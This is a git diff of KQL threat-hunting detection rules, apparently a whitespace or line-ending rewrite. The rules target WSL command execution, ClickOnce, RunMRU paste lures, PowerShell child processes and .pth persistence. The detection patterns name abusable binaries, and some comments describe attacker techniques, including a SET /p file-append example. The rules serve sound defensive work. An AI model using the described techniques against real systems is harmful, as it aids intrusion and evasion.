"osarchitecture" or ProcessCommandLine contains "product" or ProcessCommandLine contains "size" or ProcessCommandLine contains "smbiosbiosversion" or ProcessCommandLine contains "version" or ProcessCommandLine contains "videomodedescription") and (ProcessCommandLine contains "baseboard" or ProcessCommandLine contains "bios" or ProcessCommandLine contains "cpu" or ProcessCommandLine contains "diskdrive" or ProcessCommandLine contains "logicaldisk" or ProcessCommandLine contains "memphysical" or ProcessCommandLine contains "os" or ProcessCommandLine contains "path" or ProcessCommandLine contains "startup" or ProcessCommandLine contains "win32_videocontroller") and ProcessCommandLine contains "get" and (ProcessVersionInfoFileDescription =~ "WMI Commandline Utility" or ProcessVersionInfoOriginalFileName =~ "wmic.exe" or FolderPath endswith "\\WMIC.exe")) and (not(InitiatingProcessCommandLine contains "\\VMware\\VMware Tools\\serviceDiscovery\\scripts\\")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql index a4b8858b..2bba25c8 100644 --- a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql +++ b/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql @@ -1,13 +1,13 @@ -// Title: Arbitrary Command Execution Using WSL -// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) -// Date: 2020-10-05 -// Level: medium -// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting -// False Positives: -// - Automation and orchestration scripts may use this method to execute scripts etc. -// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) - -DeviceProcessEvents +// Title: Arbitrary Command Execution Using WSL +// Author: oscd.community, Zach Stanford @svch0st, Nasreddine Bencherchali (Nextron Systems) +// Date: 2020-10-05 +// Level: medium +// Description: Detects potential abuse of Windows Subsystem for Linux (WSL) binary as a Living of the Land binary in order to execute arbitrary Linux or Windows commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1218, attack.t1202, detection.threat-hunting +// False Positives: +// - Automation and orchestration scripts may use this method to execute scripts etc. +// - Legitimate use by Windows to kill processes opened via WSL (example VsCode WSL server) + +DeviceProcessEvents | where ((ProcessCommandLine contains " -e " or ProcessCommandLine contains " --exec" or ProcessCommandLine contains " --system" or ProcessCommandLine contains " --shell-type " or ProcessCommandLine contains " /mnt/c" or ProcessCommandLine contains " --user root" or ProcessCommandLine contains " -u root" or ProcessCommandLine contains "--debug-shell") and (FolderPath endswith "\\wsl.exe" or ProcessVersionInfoOriginalFileName =~ "wsl.exe")) and (not(((ProcessCommandLine contains " -d " and ProcessCommandLine contains " -e kill ") and InitiatingProcessFolderPath endswith "\\cmd.exe"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql index e6fb7135..a13e52d1 100644 --- a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql +++ b/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql @@ -1,12 +1,12 @@ -// Title: Cab File Extraction Via Wusa.EXE -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022-08-04 -// Level: medium -// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. -// MITRE Tactic: Execution -// Tags: attack.execution, detection.threat-hunting -// False Positives: -// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) - -DeviceProcessEvents +// Title: Cab File Extraction Via Wusa.EXE +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-04 +// Level: medium +// Description: Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract cab using the "/extract" argument that is no longer supported. +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - The "extract" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted) + +DeviceProcessEvents | where ProcessCommandLine contains "/extract:" and FolderPath endswith "\\wusa.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql index 18fcca0b..b2007261 100644 --- a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql +++ b/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql @@ -1,12 +1,12 @@ -// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-12 -// Level: medium -// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting -// False Positives: -// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. - -DeviceProcessEvents +// Title: ClickOnce Deployment Execution - Dfsvc.EXE Child Process +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects child processes of "dfsvc" which indicates a ClickOnce deployment execution. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - False positives are expected in environement leveraging ClickOnce deployments. An initial baselining is required before using this rule in production. + +DeviceProcessEvents | where FolderPath endswith "\\AppData\\Local\\Apps\\2.0\\" and InitiatingProcessFolderPath endswith "\\dfsvc.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql index 99233110..24eb1cbb 100644 --- a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql +++ b/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql @@ -1,13 +1,13 @@ -// Title: Command Executed Via Run Dialog Box - Registry -// Author: Ahmed Farouk, Nasreddine Bencherchali -// Date: 2024-11-01 -// Level: low -// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. -// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. -// MITRE Tactic: Execution -// Tags: detection.threat-hunting, attack.execution -// False Positives: -// - Likely - -DeviceRegistryEvents +// Title: Command Executed Via Run Dialog Box - Registry +// Author: Ahmed Farouk, Nasreddine Bencherchali +// Date: 2024-11-01 +// Level: low +// Description: Detects execution of commands via the run dialog box on Windows by checking values of the "RunMRU" registry key. +// This technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps. +// MITRE Tactic: Execution +// Tags: detection.threat-hunting, attack.execution +// False Positives: +// - Likely + +DeviceRegistryEvents | where RegistryKey contains "\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU" and (not(RegistryKey endswith "\\MRUList")) and (not(((RegistryValueData in~ ("%appdata%\\1", "%localappdata%\\1", "%public%\\1", "%temp%\\1", "calc\\1", "dxdiag\\1", "explorer\\1", "gpedit.msc\\1", "mmc\\1", "notepad\\1", "regedit\\1", "services.msc\\1", "winver\\1")) or RegistryValueData contains "ping"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql index 844268d6..ed3e79aa 100644 --- a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql +++ b/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql @@ -1,12 +1,12 @@ -// Title: Dfsvc.EXE Network Connection To Non-Local IPs -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-06-12 -// Level: medium -// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1203, detection.threat-hunting -// False Positives: -// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary - -DeviceNetworkEvents +// Title: Dfsvc.EXE Network Connection To Non-Local IPs +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-06-12 +// Level: medium +// Description: Detects network connections from "dfsvc.exe" used to handled ClickOnce applications to non-local IPs +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1203, detection.threat-hunting +// False Positives: +// - False positives are expected from ClickOnce manifests hosted on public IPs and domains. Apply additional filters for the accepted IPs in your environement as necessary + +DeviceNetworkEvents | where InitiatingProcessFolderPath endswith "\\dfsvc.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql index 0d407fd5..6d851d21 100644 --- a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql +++ b/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql @@ -1,12 +1,12 @@ -// Title: Import New Module Via PowerShell CommandLine -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-09 -// Level: low -// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session -// MITRE Tactic: Execution -// Tags: attack.execution, detection.threat-hunting -// False Positives: -// - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. - -DeviceProcessEvents +// Title: Import New Module Via PowerShell CommandLine +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-09 +// Level: low +// Description: Detects usage of the "Import-Module" cmdlet in order to add new Cmdlets to the current PowerShell session +// MITRE Tactic: Execution +// Tags: attack.execution, detection.threat-hunting +// False Positives: +// - Depending on the environement, many legitimate scripts will import modules inline. This rule is targeted for hunting purposes. + +DeviceProcessEvents | where ((ProcessCommandLine contains "Import-Module " or ProcessCommandLine contains "ipmo ") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")))) and (not(((ProcessCommandLine contains ":\\Program Files\\Microsoft Visual Studio\\" and ProcessCommandLine contains "Tools\\Microsoft.VisualStudio.DevShell.dll") and (InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" or InitiatingProcessFolderPath contains ":\\Windows\\System32\\cmd.exe")))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql index 99d5a379..01966444 100644 --- a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql +++ b/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql @@ -1,17 +1,17 @@ -// Title: Manual Execution of Script Inside of a Compressed File -// Author: @kostastsale -// Date: 2023-02-15 -// Level: medium -// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. -// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. -// 1. Compressed file opened using 7zip. -// 2. Compressed file opened using WinRar. -// 3. Compressed file opened using native windows File Explorer capabilities. -// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059, detection.threat-hunting -// False Positives: -// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results. - -DeviceProcessEvents +// Title: Manual Execution of Script Inside of a Compressed File +// Author: @kostastsale +// Date: 2023-02-15 +// Level: medium +// Description: This is a threat-hunting query to collect information related to the interactive execution of a script from inside a compressed file (zip/rar). Windows will automatically run the script using scripting interpreters such as wscript and cscript binaries. +// From the query below, the child process is the script interpreter that will execute the script. The script extension is also a set of standard extensions that Windows OS recognizes. Selections 1-3 contain three different execution scenarios. +// 1. Compressed file opened using 7zip. +// 2. Compressed file opened using WinRar. +// 3. Compressed file opened using native windows File Explorer capabilities. +// When the malicious script is double-clicked, it will be extracted to the respected directories as signified by the CommandLine on each of the three Selections. It will then be executed using the relevant script interpreter." +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059, detection.threat-hunting +// False Positives: +// - Batch files may produce a lot of noise, as many applications appear to bundle them as part of their installation process. You should baseline your environment and generate a new query excluding the noisy and expected activity. Some false positives may come up depending on your environment. All results should be investigated thoroughly before filtering out results. + +DeviceProcessEvents | where ((ProcessCommandLine =~ "*\\AppData\\local\\temp\\7z*\*" and InitiatingProcessFolderPath =~ "*\\7z*.exe") or ((ProcessCommandLine contains "\\AppData\\local\\temp*.rar\\" or ProcessCommandLine contains "\\AppData\\local\\temp*.zip\\") and InitiatingProcessFolderPath endswith "\\explorer.exe") or (ProcessCommandLine =~ "*\\AppData\\local\\temp\\rar*\*" and InitiatingProcessFolderPath endswith "\\winrar.exe")) and ((ProcessCommandLine endswith ".hta" or ProcessCommandLine endswith ".js" or ProcessCommandLine endswith ".jse" or ProcessCommandLine endswith ".ps1" or ProcessCommandLine endswith ".vbe" or ProcessCommandLine endswith ".vbs" or ProcessCommandLine endswith ".wsf" or ProcessCommandLine endswith ".wsh") and (FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe")) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql index d1b0df35..1d440713 100644 --- a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql +++ b/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Excel Add-In Loaded -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023-05-12 -// Level: low -// Description: Detects Microsoft Excel loading an Add-In (.xll) file -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, detection.threat-hunting -// False Positives: -// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs - -DeviceImageLoadEvents +// Title: Microsoft Excel Add-In Loaded +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-12 +// Level: low +// Description: Detects Microsoft Excel loading an Add-In (.xll) file +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, detection.threat-hunting +// False Positives: +// - The rules is only looking for ".xll" loads. So some false positives are expected with legitimate and allowed XLLs + +DeviceImageLoadEvents | where FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql index 024887eb..c9e3405a 100644 --- a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql +++ b/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql @@ -1,12 +1,12 @@ -// Title: Microsoft Word Add-In Loaded -// Author: Steffen Rogge (dr0pd34d) -// Date: 2024-07-10 -// Level: low -// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1204.002, detection.threat-hunting -// False Positives: -// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs. - -DeviceImageLoadEvents +// Title: Microsoft Word Add-In Loaded +// Author: Steffen Rogge (dr0pd34d) +// Date: 2024-07-10 +// Level: low +// Description: Detects Microsoft Word loading an Add-In (.wll) file which can be used by threat actors for initial access or persistence. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1204.002, detection.threat-hunting +// False Positives: +// - The rules is only looking for ".wll" loads. So some false positives are expected with legitimate and allowed WLLs. + +DeviceImageLoadEvents | where FolderPath endswith ".wll" and InitiatingProcessFolderPath endswith "\\winword.exe" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql index c7436eee..c043cfa7 100644 --- a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql +++ b/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql @@ -1,16 +1,16 @@ -// Title: Network Connection Initiated By PowerShell Process -// Author: Florian Roth (Nextron Systems) -// Date: 2017-03-13 -// Level: low -// Description: Detects a network connection that was initiated from a PowerShell process. -// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. -// Use this rule as a basis for hunting for anomalies. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.threat-hunting -// False Positives: -// - Administrative scripts -// - Microsoft IP range -// - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range') - -DeviceNetworkEvents +// Title: Network Connection Initiated By PowerShell Process +// Author: Florian Roth (Nextron Systems) +// Date: 2017-03-13 +// Level: low +// Description: Detects a network connection that was initiated from a PowerShell process. +// Often times malicious powershell scripts download additional payloads or communicate back to command and control channels via uncommon ports or IPs. +// Use this rule as a basis for hunting for anomalies. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - Administrative scripts +// - Microsoft IP range +// - Additional filters are required. Adjust to your environment (e.g. extend filters with company's ip range') + +DeviceNetworkEvents | where (InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and (not((((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) and (InitiatingProcessAccountName contains "AUTHORI" or InitiatingProcessAccountName contains "AUTORI")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "51.103.210.0/23"))))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql index d9acc39b..90bda73f 100644 --- a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql +++ b/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql @@ -1,13 +1,13 @@ -// Title: Potential BOINC Software Execution (UC-Berkeley Signature) -// Author: Matt Anderson (Huntress) -// Date: 2024-07-23 -// Level: informational -// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. -// This indicates it may be related to BOINC software and can be used maliciously if unauthorized. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting -// False Positives: -// - This software can be used for legitimate purposes when installed intentionally. - -DeviceProcessEvents +// Title: Potential BOINC Software Execution (UC-Berkeley Signature) +// Author: Matt Anderson (Huntress) +// Date: 2024-07-23 +// Level: informational +// Description: Detects the use of software that is related to the University of California, Berkeley via metadata information. +// This indicates it may be related to BOINC software and can be used maliciously if unauthorized. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, attack.t1553, detection.threat-hunting +// False Positives: +// - This software can be used for legitimate purposes when installed intentionally. + +DeviceProcessEvents | where ProcessVersionInfoFileDescription =~ "University of California, Berkeley" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql index 3e07858a..96fa9c98 100644 --- a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql +++ b/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql @@ -1,15 +1,15 @@ -// Title: Potential File Override/Append Via SET Command -// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan) -// Date: 2024-08-22 -// Level: low -// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. -// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. -// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". -// The typical use case of the "set /p=" command is to prompt the user for input. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting -// False Positives: -// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts. - -DeviceProcessEvents +// Title: Potential File Override/Append Via SET Command +// Author: Nasreddine Bencherchali (Nextron Systems), MahirAli Khan (in/mahiralikhan) +// Date: 2024-08-22 +// Level: low +// Description: Detects the use of the "SET" internal command of Cmd.EXE with the /p flag followed directly by an "=" sign. +// Attackers used this technique along with an append redirection operator ">>" in order to update the content of a file indirectly. +// Ex: cmd /c >> example.txt set /p="test data". This will append "test data" to contents of "example.txt". +// The typical use case of the "set /p=" command is to prompt the user for input. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.defense-evasion, detection.threat-hunting +// False Positives: +// - Legitimate use of the SET with the "/p" flag for user prompting. command in administrative scripts or user-generated scripts. + +DeviceProcessEvents | where (ProcessCommandLine contains "/c set /p=" or ProcessCommandLine contains "\"set /p=" or (ProcessCommandLine contains ">>" and ProcessCommandLine contains "set /p=")) and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql index 7c0ea58c..53be99b2 100644 --- a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql +++ b/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql @@ -1,13 +1,13 @@ -// Title: Potentially Suspicious PowerShell Child Processes -// Author: Florian Roth (Nextron Systems), Tim Shelton -// Date: 2022-04-26 -// Level: medium -// Description: Detects potentially suspicious child processes spawned by PowerShell. -// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.001, detection.threat-hunting -// False Positives: -// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts. - -DeviceProcessEvents +// Title: Potentially Suspicious PowerShell Child Processes +// Author: Florian Roth (Nextron Systems), Tim Shelton +// Date: 2022-04-26 +// Level: medium +// Description: Detects potentially suspicious child processes spawned by PowerShell. +// Use this rule to hunt for potential anomalies initiating from PowerShell scripts and commands. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.001, detection.threat-hunting +// False Positives: +// - False positives are to be expected from PowerShell scripts that might make use of additional binaries such as "mshta", "bitsadmin", etc. Apply additional filters for those scripts. + +DeviceProcessEvents | where ((FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and (InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe")) and (not(((ProcessCommandLine contains "-verifystore " and FolderPath endswith "\\certutil.exe") or ((ProcessCommandLine contains "qfe list" or ProcessCommandLine contains "diskdrive " or ProcessCommandLine contains "csproduct " or ProcessCommandLine contains "computersystem " or ProcessCommandLine contains " os " or ProcessCommandLine startswith "") and FolderPath endswith "\\wmic.exe")))) and (not((ProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\" and InitiatingProcessCommandLine contains "\\Program Files\\Amazon\\WorkspacesConfig\\Scripts\\"))) \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql index 24fde261..2cc0ed80 100644 --- a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql +++ b/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql @@ -1,15 +1,15 @@ -// Title: Process Execution From WebDAV Share -// Author: Swachchhanda Shrawan Poudel (Nextron Systems) -// Date: 2025-06-13 -// Level: low -// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares. -// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. -// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. -// MITRE Tactic: Execution -// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting -// False Positives: -// - Legitimate use of WebDAV shares for process execution -// - Known applications executing from WebDAV paths - -DeviceProcessEvents +// Title: Process Execution From WebDAV Share +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-06-13 +// Level: low +// Description: Detects execution of processes with image paths starting with WebDAV shares (\\), which might indicate malicious file execution from remote web shares. +// Execution of processes from WebDAV shares can be a sign of lateral movement or exploitation attempts, especially if the process is not a known legitimate application. +// Exploitation Attempt of vulnerabilities like CVE-2025-33053 also involves executing processes from WebDAV paths. +// MITRE Tactic: Execution +// Tags: attack.execution, attack.command-and-control, attack.lateral-movement, attack.t1105, detection.threat-hunting +// False Positives: +// - Legitimate use of WebDAV shares for process execution +// - Known applications executing from WebDAV paths + +DeviceProcessEvents | where FolderPath contains "\\DavWWWRoot\\" and FolderPath startswith "\\\\" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql index c346f388..f30726ea 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_linux.kql @@ -1,14 +1,14 @@ -// Title: Python Path Configuration File Creation - Linux -// Author: Andreas Braathen (mnemonic.io) -// Date: 2024-04-25 -// Level: medium -// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. -// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. -// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). -// MITRE Tactic: Execution -// Tags: attack.execution, attack.t1059.006, detection.threat-hunting -// False Positives: -// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. - -DeviceFileEvents +// Title: Python Path Configuration File Creation - Linux +// Author: Andreas Braathen (mnemonic.io) +// Date: 2024-04-25 +// Level: medium +// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. +// Modules referenced by these files are run at every Python startup (v3.5+), regardless of whether the module is imported by the calling script. +// Default paths are '\lib\site-packages\*.pth' (Windows) and '/lib/pythonX.Y/site-packages/*.pth' (Unix and macOS). +// MITRE Tactic: Execution +// Tags: attack.execution, attack.t1059.006, detection.threat-hunting +// False Positives: +// - Although .pth files are discouraged due to potential security implications, these are legitimate files by specification. + +DeviceFileEvents | where FolderPath endswith ".pth" and FolderPath matches regex "(?i)/lib/python3\\.([5-9]|[0-9]{2})/site-packages/" \ No newline at end of file diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql index 55513269..f843fd86 100644 --- a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql +++ b/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_macos.kql @@ -1,14 +1,14 @@ -// Title: Python Path Configuration File Creation - MacOS -// Author: Andreas Braathen (mnemonic.io) -// Date: 2024-04-25 -// Level: medium -// Description: Detects creation of a Python path configuration file (.pth) in Python library folders, which can be maliciously abused for code execution and persistence. -// Modules referenced by 